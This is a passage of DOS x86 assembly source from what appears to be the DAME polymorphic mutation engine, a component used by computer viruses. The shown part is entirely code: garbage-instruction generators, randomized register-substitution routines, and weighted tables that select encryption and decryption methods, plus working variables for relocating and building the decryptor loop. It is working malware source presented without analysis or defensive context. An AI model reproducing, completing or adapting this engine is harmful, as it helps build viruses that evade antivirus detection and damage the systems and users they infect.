add al,8
jmp short _dec_inc_reg
inc_reg:
push ax
_dec_inc_reg:
or al,al
jns _norm_inc
mov ah,0ff
call mod_xxx_rm
pop ax
ret
_norm_inc:
add al,40
stosb
pop ax
ret
_mov_reg_reg_3rd_reg:
mov bx,offset mov_reg_reg
mov si,offset mov_xchg_reg_reg
or al,al ; Is reg1 a pointer register?
js reg_to_reg1 ; If so, we cannot use XCHG
jmp short reg_to_reg
xor_reg_reg_reg_reg:
mov bx,offset _xor_reg_reg
jmp short reg_to_reg1
add_reg_reg_reg_reg:
mov bx,offset _add_reg_reg
jmp short reg_to_reg1
sub_reg_reg_reg_reg:
mov bx,offset _sub_reg_reg
reg_to_reg1:
mov si,bx
reg_to_reg:
call free_regs
jne no_free_regs
push ax si
call get_another ; Get unused register (reg3)
call mov_reg_reg ; MOV REG3,REG2
pop si dx
xchg ax,dx
finish_reg_clear_dx:
push dx
call si
pop ax
jmp clear_reg
_xor_reg_xxxx_reg_reg:
mov bx,offset xor_reg_xxxx
mov si,offset xor_reg_reg
xxxx_to_reg:
call free_regs
jne no_free_regs
push ax si
call get_another ; Get unused register (reg3)
call mov_reg_xxxx ; MOV REG3,XXXX
xchg ax,dx
pop si ax
jmp short finish_reg_clear_dx
no_free_regs:
jmp bx
_add_reg_xxxx_reg_reg:
mov bx,offset add_reg_xxxx
mov si,offset add_reg_reg
jmp short xxxx_to_reg
_mov_reg_xxxx_reg_reg:
mov bx,offset mov_reg_xxxx
mov si,offset mov_xchg_reg_reg
jmp short xxxx_to_reg
; The following are a collection of tables used by the various encoding
; routines to determine which routine will be used. The first line in each
; table holds the mask for the encoding procedure. The second line holds the
; default routine which is used when nesting is disabled. The number of
; entries in each table must be a power of two. To adjust the probability of
; the occurence of any particular routine, simply vary the number of times it
; appears in the table relative to the other routines.
; The following table governs garbling.
garbletable:
db garbletableend - $ - 3
dw offset return
dw offset return
dw offset return
dw offset return
dw offset return
dw offset garble_tworeg
dw offset garble_tworeg
dw offset garble_tworeg
dw offset garble_onereg
dw offset garble_onereg
dw offset garble_onereg
dw offset garble_onebyte
dw offset garble_onebyte
dw offset garble_onebyte
dw offset garble_jmpcond
dw offset clear_PIQ
garbletableend:
; This table is used by the one byte garbler. It is intuitively obvious.
onebytetable:
clc
cmc
stc
cld
std
sti
int 3
lock
; This table is used by the one register garbler. When each of the functions
; in the table is called, ax holds a random, unused register, and dx holds a
; random number.
oneregtable:
db oneregtableend - $ - 3
dw offset xor_reg_xxxx
dw offset mov_reg_xxxx
dw offset sub_reg_xxxx
dw offset add_reg_xxxx
dw offset dec_reg
dw offset inc_reg
dw offset _ror
dw offset _rol
oneregtableend:
; This table is used to determine the decryption method
oneregtable1: ; dx = random #
db oneregtable1end - $ - 3
dw offset xor_reg_xxxx
dw offset sub_reg_xxxx
dw offset add_reg_xxxx
dw offset add_reg_xxxx
dw offset dec_reg
dw offset inc_reg
dw offset _ror
dw offset _rol
oneregtable1end:
; This table is used to determine the encryption method
oneregtable2: ; dx = random #
db oneregtable2end - $ - 3
dw offset xor_reg_xxxx
dw offset add_reg_xxxx
dw offset sub_reg_xxxx
dw offset sub_reg_xxxx
dw offset inc_reg
dw offset dec_reg
dw offset _rol
dw offset _ror
oneregtable2end:
tworegtable: ; dl = any register
db tworegtableend - $ - 3
dw offset xor_reg_reg
dw offset mov_reg_reg
dw offset sub_reg_reg
dw offset add_reg_reg
tworegtableend:
tworegtable1: ; dl = any register
db tworegtable1end - $ - 3
dw offset xor_reg_reg
dw offset xor_reg_reg
dw offset sub_reg_reg
dw offset add_reg_reg
tworegtable1end:
tworegtable2: ; dl = any register
db tworegtable2end - $ - 3
dw offset xor_reg_reg
dw offset xor_reg_reg
dw offset add_reg_reg
dw offset sub_reg_reg
tworegtable2end:
mov_reg_xxxx_table:
db mov_reg_xxxx_table_end - $ - 3
dw offset _mov_reg_xxxx
dw offset _mov_reg_xxxx_reg_reg
dw offset _mov_reg_xxxx_mov_add
dw offset _mov_reg_xxxx_mov_al_ah
dw offset _mov_reg_xxxx_mov_xor
dw offset _mov_reg_xxxx_xor_add
dw offset _mov_reg_xxxx_mov_rol
dw offset _mov_reg_xxxx_mov_ror
mov_reg_xxxx_table_end:
mov_reg_reg_table:
db mov_reg_reg_table_end - $ - 3
dw offset _mov_reg_reg
dw offset _mov_reg_reg
dw offset _mov_reg_reg_3rd_reg
dw offset _mov_reg_reg_push_pop
mov_reg_reg_table_end:
xchg_reg_reg_table:
db xchg_reg_reg_table_end - $ - 3
dw offset _xchg_reg_reg
dw offset _xchg_reg_reg
dw offset _xchg_reg_reg_push_pop
dw offset _xchg_reg_reg_3rd_reg
xchg_reg_reg_table_end:
xor_reg_xxxx_table:
db xor_reg_xxxx_table_end - $ - 3
dw offset _xor_reg_xxxx
dw offset _xor_reg_xxxx
dw offset _xor_reg_xxxx_reg_reg
dw offset xor_reg_xxxx_xor_xor
xor_reg_xxxx_table_end:
xor_reg_reg_table:
db xor_reg_reg_table_end - $ - 3
dw offset _xor_reg_reg
dw offset xor_reg_reg_reg_reg
xor_reg_reg_table_end:
add_reg_reg_table:
db add_reg_reg_table_end - $ - 3
dw offset _add_reg_reg
dw offset add_reg_reg_reg_reg
add_reg_reg_table_end:
sub_reg_reg_table:
db sub_reg_reg_table_end - $ - 3
dw offset _sub_reg_reg
dw offset sub_reg_reg_reg_reg
sub_reg_reg_table_end:
add_reg_xxxx_table:
db add_reg_xxxx_table_end - $ - 3
dw offset _add_reg_xxxx
dw offset _add_reg_xxxx
dw offset _add_reg_xxxx_reg_reg
dw offset sub_reg_xxxx1
dw offset _add_reg_xxxx_inc_add
dw offset _add_reg_xxxx_dec_add
dw offset _add_reg_xxxx_add_add
dw offset _add_reg_xxxx_add_add
add_reg_xxxx_table_end:
endif
if not vars eq 0 ; if (vars != 0)
; _nest is needed to prevent the infinite recursion which is possible in a
; routine such as the one used by DAME. If this value goes above the
; threshold value (defined as MAXNEST), then no further garbling/obfuscating
; will occur.
_nest db ?
; This is used by the routine mod_reg_rm when encoding memory accessing
; instructions. The value in _relocate_amt is later added to the relocation
; value to determine the final value of the memory adjustment. For example,
; we initially have, as the encryption instruction:
; add [bx+0],ax
; Let's say _relocate_amt is set to 2. Now the instruction reads:
; add [bx+2],ax
; Finally, the relocate procedure alters this to:
; add [bx+202],ax
; or whatever the appropriate value is.
;
; This value is used in double word encryptions.
_relocate_amt db ?
; Various memory locations which we must keep track of for calculations:
_loopstartencrypt dw ?
_loopstartdecrypt dw ?
_encryptpointer dw ?
_decryptpointer dw ?
_decryptpointer2 dw ?
_start_encrypt dw ?
_start_decrypt dw ?
beginclear1:
; _used_regs is the register tracker. Each byte corresponds to a register.
; AX = 0, CX = 1, DX = 2, etc. Each byte may be either set or zero. If it
; is zero, then the register's current value is unimportant to the routine.
; If it is any other value, then the routine should not play with the value
; contained in the register (at least without saving it first).
_used_regs db 8 dup (?) ; 0 = unused
; The following four variables contain the addresses in current memory which
; contain the patch locations for the memory addressing instructions, i.e.
; XOR WORD PTR [bx+3212],3212
; It is used at the end of the master encoding routine.
_encrypt_relocate_num dw ?
_encrypt_relocator dw 8 dup (?)
_decrypt_relocate_num dw ?
_decrypt_relocator dw 10 dup (?)
endclear1:
_encrypt_length dw ? ; The number of bytes to encrypt
; (based upon alignment)
_counter_value dw ? ; Forwards or backwards
_decrypt_value dw ? ; Not necessarily the crypt key
_pointer_value1 dw ? ; Pointer register 1's initial value
_pointer_value2 dw ? ; Pointer register 2's initial value
_counter_reg db ?
_encrypt_reg db ?
_pointer_reg1 db ? ; 4 = not in use
_pointer_reg2 db ?
_pointer_rm db ? ; Holds r/m value for pointer registers
_maxnest db ?
_kludge dw ?
endif